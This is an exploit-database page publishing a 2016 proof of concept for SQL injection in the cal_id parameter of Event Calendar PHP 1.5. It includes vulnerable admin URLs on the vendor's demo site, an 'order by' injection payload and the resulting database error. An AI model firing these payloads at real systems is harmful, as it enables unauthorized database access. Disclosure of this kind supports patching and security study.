Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') | Not available | Unknown |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | Unknown | Remote | 2016-10-22 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L | 0.02192 | 0.50148 |
Event Calendar PHP 1.5 SQL Injection ===================================================== # Event Calendar PHP 1.5 - SQL Injection ===================================================== # Vendor Homepage: http://eventcalendarphp.com/ # Date: 21 Oct 2016 # Demo Link : http://eventcalendarphp.com/eventcalendar/admin.php # Version : 1.5 # Platform : WebApp - PHP # Author: Ashiyane Digital Security Team # Contact: [email protected] ===================================================== # PoC: Vulnerable Url: http://eventcalendarphp.com/eventcalendar/admin.php?act=options&cal_id=[payload] http://eventcalendarphp.com/eventcalendar/admin.php?act=cal_options&cal_id=[payload] http://eventcalendarphp.com/eventcalendar/admin.php?act=cal_language&cal_id=[payload] Vulnerable parameter : cal_id Mehod : GET A simple inject : Payload : '+order+by+20--+ http://eventcalendarphp.com/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+ In response can see result : query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by 20-- '. Error: Unknown column '20' in 'order clause' Result of payload: Error: Unknown column '20' in 'order clause' ===================================================== # Discovered By : Ehsan Hosseini =====================================================
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.